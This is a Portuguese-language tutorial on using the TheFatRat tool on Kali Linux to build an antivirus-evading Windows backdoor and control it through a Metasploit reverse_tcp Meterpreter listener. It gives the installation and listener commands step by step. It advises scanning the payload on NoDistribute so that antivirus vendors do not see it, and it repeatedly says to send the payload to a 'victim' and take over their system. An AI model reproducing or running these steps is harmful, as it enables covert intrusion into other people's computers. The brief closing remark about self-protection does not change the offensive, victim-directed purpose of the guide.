Metasploit – Invasão WINDOWS com FATRAT

O FatRat é um projeto de código aberto disponível no Github. O script é codificado pelo Screetsec.

O melhor do FatRat é que ele pode gerar backdoors e cargas úteis para todas as plataformas populares, como Windows, Mac, Linux e Android. Essas backdoors e cargas úteis podem ser usadas para ataques de navegadores, ataques de dll etc.

Categorias: , , ,

Descrição

TheFatRat- gera carga indetectável para exploração do Windows – Kali Linux

O que é TheFatRat?

Generate Undetectable Payload for Windows Using Kali Linux
 
O FatRat é um projeto de código aberto disponível no Github. O script é codificado pelo Screetsec.

O melhor do FatRat é que ele pode gerar backdoors e cargas úteis para todas as plataformas populares, como Windows, Mac, Linux e Android. Essas backdoors e cargas úteis podem ser usadas para ataques de navegadores, ataques de dll etc.

Essa ferramenta compila um malware com cargas úteis e, em seguida, as cargas úteis podem ser executadas nas plataformas mencionadas acima. A vantagem especial desta ferramenta é que ela pode criar um malware poderoso, capaz de contornar a maioria das proteções de software antivírus.

Você pode gerar backdoors, cargas úteis para todas essas plataformas em uma ferramenta. Não é uma coisa boa?

Recursos do TheFatRat:

1. Pode criar backdoors para Windows, Mac, Linux, Android.
2. Ignore a proteção de software antivírus.
3. Vários ouvintes multímetro podem ser iniciados usando-o.
4. Também pode criar script de execução automática.
5. Os backdoors gerados podem ser vinculados com MS Word, PDF, arquivo RAR etc.

Vamos em frente e ver como ele pode ser configurado no Kali Linux.

Etapa 1: Instale o FatRat no Kali Linux:

Primeiro, inicie a sua máquina Kali Linux e abra o terminal. Baixe / clone TheFatRat a partir daqui .

Mude o diretório para Desktop ou onde quiser. Aqui estou usando os seguintes comandos para clonar a ferramenta.

cd Desktop /
git clone https://github.com/Screetsec/TheFatRat.git

Este comando clonará a ferramenta na área de trabalho. O arquivo é um pouco grande em torno de 200 MB, portanto, levará algum tempo para concluir o download. A velocidade do download depende da velocidade da sua internet. Agora, altere o diretório para a pasta TheFatRat. No meu caso, estou usando o comando

cd Desktop /
ls
cd TheFatRat /
ls

Generate Undetectable Payload for Windows Using Kali Linux

Agora, você precisa obter permissão de root para o script setup.sh . Aqui, o script é exibido na cor verde (depende da cor do texto do terminal), o que significa que eu já tenho a permissão. Se você não possui, execute o comando chmod + x setup.sh e ele concederá permissão de root para o script.

Na próxima etapa, execute o script pelo comando

./setup.sh

O script será iniciado e verificará os pacotes necessários, se estiverem instalados ou não. Caso contrário, ele será instalado automaticamente. Após concluir a verificação, aparecerá uma pergunta perguntando se você deseja criar um caminho para o FatRat ou não.

Generate Undetectable Payload for Windows Using Kali Linux
Se você não tiver certeza, clique em ‘Não’ ou se você deseja criar um caminho para poder abri-lo de onde quiser, clique em ‘Sim’. Eu recomendo que você clique em ‘Sim’ para poder abri-lo no terminal.

Agora sua configuração foi concluída com sucesso.

Na próxima etapa, saia do terminal, abra um novo terminal e execute o FatRat com o comando

fatrat

Este comando iniciará a ferramenta. Ao iniciar, a ferramenta verifica a conexão com a Internet, os pacotes necessários estão instalados corretamente ou não. Depois de verificar tudo, o TheFatRat iniciará o menu de opções para criar backdoors.

Vamos em frente e ver como podemos gerar uma carga indetectável usando TheFatRat.

Etapa 2: Gere uma carga útil indetectável (100% FUD) usando o FatRat:

Bem, agora é hora de gerar uma carga útil para executar no sistema da vítima. Abra um novo terminal e inicie a ferramenta FatRat com o comando ‘ fatrat’ . Depois de carregar o FatRat, você verá muitas opções para criar backdoors diferentes para plataformas diferentes. Aqui estou selecionando a segunda opção que é-

[02] Crie um backdoor 100% Fud com o Fudwin 1.0

Generate Undetectable Payload for Windows Using Kali Linux

Esta opção é gerar carga útil para uma máquina Windows. Após selecionar a opção, novas opções aparecerão. Aqui estou usando a versão mais recente do Fatrat. Cheguei aqui uma nova opção chamada Powerstager 0.2.5 .

Generate Undetectable Payload for Windows Using Kali Linux

Eu tentei a opção No.1, mas ela não conseguiu criar uma carga útil e mostrou um erro ao criar a carga útil. Talvez a ferramenta esteja no modo de desenvolvimento agora. Não se preocupe, tente a primeira opção depois de alguns meses. Agora continue o trabalho com a opção No.2.

Velho é bom! Selecionei a segunda opção, que diz Lenta, mas poderosa .

Após inserir a segunda opção, a ferramenta mostrará o IPV4 local, o endereço IPV6, o endereço IP público e o nome do host.

Generate Undetectable Payload for Windows Using Kali Linux

Aqui aplicarei a carga útil no meu outro PC conectado à minha rede local. Então, eu estou usando o IP local aqui. Se você deseja que ele funcione na WAN, leve seu endereço IP público.
(NB: Se você deseja obter o IP público para que a carga útil possa funcionar na WAN, o IP deve ser estático. Se você tiver um IP público dinâmico, poderá lidar com um site sem IP . Ele fornecerá um nome de host para grátis, que você pode usar como um IP estático em vez de um IP dinâmico. Nosso tutorial no site no-ip está chegando! Fique atento até então. )

Agora, defina o IP local, defina qualquer número de porta local e pressione Enter.

Nesta tela, a ferramenta solicitará que você escolha sua arquitetura do Windows para gerar a carga útil de acordo com ela. Aqui, meu Windows é de 64 bits e é por isso que estou selecionando a carga útil de 64 bits do FUD .

Generate Undetectable Payload for Windows Using Kali Linux

Agora a ferramenta começará a gerar a carga útil. Pode mostrar vários erros durante o processo de geração, mas não se preocupe. Fique com paciência até que termine o processo.

Generate Undetectable Payload for Windows Using Kali Linux

 

Aqui eu geramos a carga útil que é salva na pasta de saída do TheFatrat.

Fiz upload da carga gerada no VirusTotal . Apenas 3 softwares antivírus detectaram vírus em 69, mas não é recomendável carregá-lo no VirusTotal. Faça o upload e digitalize-o no NoDistribute para garantir que você tenha criado uma carga útil indetectável.

Agora envie a carga útil para a vítima e defina um ouvinte para que você possa controlar o sistema.

Vamos em frente e ver como definir um ouvinte.

Etapa 3: defina um ouvinte na carga (TCP reverso do Meterpreter):

Bem, estamos no fim. Agora é hora de fazer um hack com a carga útil. Para fazer isso, precisamos definir um ouvinte. Siga o guia. Primeiro, abra um novo terminal e inicie o Metasploit com o comando
msfconsole
Este comando carregará a interface do Metasploit. Agora digite o comando
use exploit / multi / handler
 
Este comando iniciará o manipulador múltiplo. Na próxima etapa, defina a carga útil de destino com o comando
set payload windows/meterpreter/reverse_tcp
 
Agora é hora de definir o host e a porta locais. Execute os comandos
set lhost 192.168.42.138 ( ip local da sua maquina ok!)
set lport 8080 ( porta utilizada la na criação da payload do fatrat manezao!)
Aqui, substitua o IP local e a porta pela sua. O IP e a porta são os mesmos que usamos para criar a carga útil. Você deve fazer o mesmo.

Agora inicie o manipulador de carga útil com o comando

exploit

Generate Undetectable Payload for Windows Using Kali Linux
Este é o momento de enviar a carga útil para a vítima. Se a vítima clicar na carga, ela será conectada a nós e o manipulador da carga mostrará a mensagem.

Agora é hora de usar o multímetro. Os comandos comuns que você pode usar aqui para operar o sistema da vítima são dados abaixo. Aqui estou adicionando uma captura de tela extra para provar se os comandos meterpreter estão funcionando ou não.

Generate Undetectable Payload for Windows Using Kali Linux

Para saber mais comandos, digite ‘ ? ‘e pressione enter. Você receberá todos os comandos que você pode usar contra a vítima para controlar seu sistema.

Conclusão:

É bom que possamos criar cargas úteis gratuitamente. Devemos agradecer ao criador do roteiro. Mas o ruim é que é um projeto de código aberto e qualquer pessoa pode usá-lo mal. Principalmente os coelhos de roteiro.
Além disso, podemos obter algum conhecimento sobre cargas úteis. Como eles funcionam, como podem ser criados e podemos nos proteger de cargas úteis etc.

se você achou o tutorial útil, não se esqueça de nos informar e também se estiver enfrentando algum problema com a instalação ou o uso desta ferramenta, sinta-se à vontade para comentar abaixo.